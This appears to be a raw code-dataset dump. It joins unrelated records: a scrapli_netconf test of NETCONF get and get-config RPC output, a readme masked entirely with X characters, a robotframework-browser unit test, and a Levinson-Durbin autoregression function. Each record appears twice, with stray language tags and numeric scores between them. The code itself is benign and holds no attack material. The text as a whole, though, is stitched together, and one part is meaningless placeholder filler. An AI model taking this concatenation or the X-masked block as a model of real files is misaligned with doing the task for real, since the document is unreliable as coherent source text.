<reponame>dmulyalin/scrapli_netconf<filename>tests/unit/driver/test_sync_driver.py<gh_stars>10-100 from scrapli_netconf.constants import NetconfVersion def test_get(monkeypatch, dummy_conn): monkeypatch.setattr( "scrapli_netconf.channel.sync_channel.NetconfChannel.send_input_netconf", lambda cls, channel_input: b"<sent!>", ) filter_ = """ <interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"> <interface-configuration> <active>act</active> </interface-configuration> </interface-configurations> """ dummy_conn.netconf_version = NetconfVersion.VERSION_1_0 actual_response = dummy_conn.get(filter_=filter_) assert actual_response.raw_result == b"<sent!>" assert ( actual_response.channel_input == """<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get><filter type="subtree"><interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"><interface-configuration><active>act</active></interface-configuration></interface-configurations></filter></get></rpc>]]>]]>""" ) def test_get_config(monkeypatch, dummy_conn): monkeypatch.setattr( "scrapli_netconf.channel.sync_channel.NetconfChannel.send_input_netconf", lambda cls, channel_input: b"<sent!>", ) dummy_conn.netconf_version = NetconfVersion.VERSION_1_0 dummy_conn.readable_datastores = ["running"] actual_response = dummy_conn.get_config() assert actual_response.raw_result == b"<sent!>" assert ( actual_response.channel_input == """<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get-config><source><running/></source></get-config></rpc>]]>]]>""" )
from scrapli_netconf.constants import NetconfVersion def test_get(monkeypatch, dummy_conn): monkeypatch.setattr( "scrapli_netconf.channel.sync_channel.NetconfChannel.send_input_netconf", lambda cls, channel_input: b"<sent!>", ) filter_ = """ <interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"> <interface-configuration> <active>act</active> </interface-configuration> </interface-configurations> """ dummy_conn.netconf_version = NetconfVersion.VERSION_1_0 actual_response = dummy_conn.get(filter_=filter_) assert actual_response.raw_result == b"<sent!>" assert ( actual_response.channel_input == """<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get><filter type="subtree"><interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"><interface-configuration><active>act</active></interface-configuration></interface-configurations></filter></get></rpc>]]>]]>""" ) def test_get_config(monkeypatch, dummy_conn): monkeypatch.setattr( "scrapli_netconf.channel.sync_channel.NetconfChannel.send_input_netconf", lambda cls, channel_input: b"<sent!>", ) dummy_conn.netconf_version = NetconfVersion.VERSION_1_0 dummy_conn.readable_datastores = ["running"] actual_response = dummy_conn.get_config() assert actual_response.raw_result == b"<sent!>" assert ( actual_response.channel_input == """<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get-config><source><running/></source></get-config></rpc>]]>]]>""" )
en
0.220313
<interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"> <interface-configuration> <active>act</active> </interface-configuration> </interface-configurations> <?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get><filter type="subtree"><interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"><interface-configuration><active>act</active></interface-configuration></interface-configurations></filter></get></rpc>]]>]]> <?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get-config><source><running/></source></get-config></rpc>]]>]]>
1.925885
2
adminlte/static/plugins/datatables/extensions/KeyTable/Readme.txt.py
dnaextrim/django_adminlte_x
4
6627948
<reponame>dnaextrim/django_adminlte_x<gh_stars>1-10 X XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXXXXXXX XXX XXXXXXXXXX XXXXXXX XXX XXXXXXXXXX XXXXXXXX XXXXXXX XX XXXXXXXX XXXXX XXXX XXXX XXXXXXXXXX XX XXX XXXXXX XXXXXX XXXXXXX XXXXX XXXXXX XXXX XXX XX XXXXXXXX XX XXXXXXXXXX XXXXXX XXXXXXXX XXXX XX XXX XXXXX XX XXXXX XXXXXXXX XXXXXXXXXXX XXXXXXXXX XXX XXXXXXXX XXXXXXXX X XXXX XX XXX XXXXXXXXXXX XXXX XXXXXXXXXXX X XXXXX XXXXXXXXXX XXXX XXXXXXXXXX X XXXX XXXXX XX XXXXXXXXX XXXXXX X XXXXXXXXXXXX XX XXX XXXXXXXXX XXXXX XXXXXXXX XXXXXXXXXX X XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXX XXXXX XXX XXXXXXXX XXXXXXXX XXXXXXX XXXX X XXXXXXXXXXXX XXXXXXXXX XX XXX XXXXXXXXXX XXXXXXXX XXXX XXXX XXXXX XXX XXXXX XX XXX XXXXXXXX XX XXXXXXX XXXXXXXXXX XX XXX XXX XXXXXXXX XXXXXXXX XXXX XXX XXXXXXXXXX XXXXXXXXX XX XXXX XXXXXXXXXXXX X XXXXX XXXXX XXXXXXXX XX XXXXXXXXXXX XXXXX XXX XXX XXXXXX XXXX XX XXXX XX XXXXXXXXXXX XXXXX XXXXXXX XXX XXXXXXXX XXXXX XXXXXXXXXXXXXXXXXX XXXXXXXX XX X XXX XXXXX X XXXXXXXXXXXXXXXXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXX XX X XX XXX X XXXXXXXXXXXXX X XXXXXXX X XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXXXXXXXXX XXXXXXX XXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXXXXX XX XXX XXXXX XXXXXXX XXXXXXXX XXXX XXX XXXXXXXXXXX XX XXXXXXXX XXX XXXX XXXX XX XXXXXXX XXXXXX XXXXX XX XXX XXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXXXXXXX XXX XXXXXXXXXX XXXXXXX XXX XXXXXXXXXX XXXXXXXX XXXXXXX XX XXXXXXXX XXXXX XXXX XXXX XXXXXXXXXX XX XXX XXXXXX XXXXXX XXXXXXX XXXXX XXXXXX XXXX XXX XX XXXXXXXX XX XXXXXXXXXX XXXXXX XXXXXXXX XXXX XX XXX XXXXX XX XXXXX XXXXXXXX XXXXXXXXXXX XXXXXXXXX XXX XXXXXXXX XXXXXXXX X XXXX XX XXX XXXXXXXXXXX XXXX XXXXXXXXXXX X XXXXX XXXXXXXXXX XXXX XXXXXXXXXX X XXXX XXXXX XX XXXXXXXXX XXXXXX X XXXXXXXXXXXX XX XXX XXXXXXXXX XXXXX XXXXXXXX XXXXXXXXXX X XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXX XXXXX XXX XXXXXXXX XXXXXXXX XXXXXXX XXXX X XXXXXXXXXXXX XXXXXXXXX XX XXX XXXXXXXXXX XXXXXXXX XXXX XXXX XXXXX XXX XXXXX XX XXX XXXXXXXX XX XXXXXXX XXXXXXXXXX XX XXX XXX XXXXXXXX XXXXXXXX XXXX XXX XXXXXXXXXX XXXXXXXXX XX XXXX XXXXXXXXXXXX X XXXXX XXXXX XXXXXXXX XX XXXXXXXXXXX XXXXX XXX XXX XXXXXX XXXX XX XXXX XX XXXXXXXXXXX XXXXX XXXXXXX XXX XXXXXXXX XXXXX XXXXXXXXXXXXXXXXXX XXXXXXXX XX X XXX XXXXX X XXXXXXXXXXXXXXXXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXX XX X XX XXX X XXXXXXXXXXXXX X XXXXXXX X XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXXXXXXXXX XXXXXXX XXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXXXXX XX XXX XXXXX XXXXXXX XXXXXXXX XXXX XXX XXXXXXXXXXX XX XXXXXXXX XXX XXXX XXXX XX XXXXXXX XXXXXX XXXXX XX XXX XXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
none
1
1.346326
1
utest/test_development_functionality.py
mawentao119/robotframework-browser
0
6627949
<filename>utest/test_development_functionality.py from Browser.keywords.playwright_state import PlaywrightState def test_pause_on_failure(): def whole_lib(): pass whole_lib._pause_on_failure = set() whole_lib.playwright = whole_lib browser = PlaywrightState(whole_lib) def func(*args, **kwargs): pass browser.new_browser = func browser.new_context = func browser.new_page = func browser.open_browser() assert whole_lib._pause_on_failure
<filename>utest/test_development_functionality.py from Browser.keywords.playwright_state import PlaywrightState def test_pause_on_failure(): def whole_lib(): pass whole_lib._pause_on_failure = set() whole_lib.playwright = whole_lib browser = PlaywrightState(whole_lib) def func(*args, **kwargs): pass browser.new_browser = func browser.new_context = func browser.new_page = func browser.open_browser() assert whole_lib._pause_on_failure
none
1
2.000015
2
dsatools/_base/_arma/_ar_levenson_durbin.py
diarmaidocualain/dsatools
31
6627950
<reponame>diarmaidocualain/dsatools<filename>dsatools/_base/_arma/_ar_levenson_durbin.py import numpy as np import scipy from ... import operators #------------------------------------------ def ar_levenson_durbin(x, order,mode='same',unbias = False): ''' The autoregressive model approximation, based on the Levenson-Dubrin itterative method for solution toeplitz matrix equations. Parameters ------------------- * x: is 1-d input ndarray. * order: int, is the order of the desired model. * mode: string, mode of correlation function, mode = {full, same, straight}. * unbias: bool, if True, the unbiased autocorrleation function will be taken. Returns --------------------- * a: 1d ndarray, autoregression coefficients, * noise_variace: float or complex, variance of model residulas. See also ------------ yule_walker, lsar, covar, burg. Examples ----------- References -------------------- [1a] <NAME>, and <NAME>. "Spectral analysis of signals." (2005). [1b] http://www2.ece.ohio-state.edu/~randy/SAtext/ - Dr.Moses Spectral Analysis of Signals: Resource Page [2a] <NAME>. Statistical Digital Signal Processing and Modeling, John Wiley & Sons, 1996. [2b] https://www.mathworks.com/matlabcentral/fileexchange/ 2183-statistical-digital-signal-processing-and-modeling [3] <NAME>, Digital spectral analysis with applications. – New-York: Present-Hall, 1986. ''' x = np.asarray(x) N = x.shape[0] r = operators.correlation(x,y=None,mode=mode, take_mean=False,unbias=unbias) a = np.zeros((order,), x.dtype) var = r[0] - (r[1] *np.conj(r[1]))/r[0] a[0] = -r[1] / r[0] for i in np.arange(1,order): k = -(r[i+1] + np.sum(a[:i]*r[i:0:-1]))/var #r[i:0:-1]=np.flipud(r[1:i+1]) var = var*(1-(k *np.conj(k))) # same as a[:i+1] = [a,0] + k[a~,1] in Stoic a[:i] = a[:i] + k*np.conj(a[i-1::-1]) a[i] = k # here is sign "-" is already taken a = np.append(1,a) return a, var
import numpy as np import scipy from ... import operators #------------------------------------------ def ar_levenson_durbin(x, order,mode='same',unbias = False): ''' The autoregressive model approximation, based on the Levenson-Dubrin itterative method for solution toeplitz matrix equations. Parameters ------------------- * x: is 1-d input ndarray. * order: int, is the order of the desired model. * mode: string, mode of correlation function, mode = {full, same, straight}. * unbias: bool, if True, the unbiased autocorrleation function will be taken. Returns --------------------- * a: 1d ndarray, autoregression coefficients, * noise_variace: float or complex, variance of model residulas. See also ------------ yule_walker, lsar, covar, burg. Examples ----------- References -------------------- [1a] <NAME>, and <NAME>. "Spectral analysis of signals." (2005). [1b] http://www2.ece.ohio-state.edu/~randy/SAtext/ - Dr.Moses Spectral Analysis of Signals: Resource Page [2a] <NAME>. Statistical Digital Signal Processing and Modeling, John Wiley & Sons, 1996. [2b] https://www.mathworks.com/matlabcentral/fileexchange/ 2183-statistical-digital-signal-processing-and-modeling [3] <NAME>, Digital spectral analysis with applications. – New-York: Present-Hall, 1986. ''' x = np.asarray(x) N = x.shape[0] r = operators.correlation(x,y=None,mode=mode, take_mean=False,unbias=unbias) a = np.zeros((order,), x.dtype) var = r[0] - (r[1] *np.conj(r[1]))/r[0] a[0] = -r[1] / r[0] for i in np.arange(1,order): k = -(r[i+1] + np.sum(a[:i]*r[i:0:-1]))/var #r[i:0:-1]=np.flipud(r[1:i+1]) var = var*(1-(k *np.conj(k))) # same as a[:i+1] = [a,0] + k[a~,1] in Stoic a[:i] = a[:i] + k*np.conj(a[i-1::-1]) a[i] = k # here is sign "-" is already taken a = np.append(1,a) return a, var
en
0.631046
#------------------------------------------ The autoregressive model approximation, based on the Levenson-Dubrin itterative method for solution toeplitz matrix equations. Parameters ------------------- * x: is 1-d input ndarray. * order: int, is the order of the desired model. * mode: string, mode of correlation function, mode = {full, same, straight}. * unbias: bool, if True, the unbiased autocorrleation function will be taken. Returns --------------------- * a: 1d ndarray, autoregression coefficients, * noise_variace: float or complex, variance of model residulas. See also ------------ yule_walker, lsar, covar, burg. Examples ----------- References -------------------- [1a] <NAME>, and <NAME>. "Spectral analysis of signals." (2005). [1b] http://www2.ece.ohio-state.edu/~randy/SAtext/ - Dr.Moses Spectral Analysis of Signals: Resource Page [2a] <NAME>. Statistical Digital Signal Processing and Modeling, John Wiley & Sons, 1996. [2b] https://www.mathworks.com/matlabcentral/fileexchange/ 2183-statistical-digital-signal-processing-and-modeling [3] <NAME>, Digital spectral analysis with applications. – New-York: Present-Hall, 1986. #r[i:0:-1]=np.flipud(r[1:i+1]) # same as a[:i+1] = [a,0] + k[a~,1] in Stoic # here is sign "-" is already taken
2.537355
3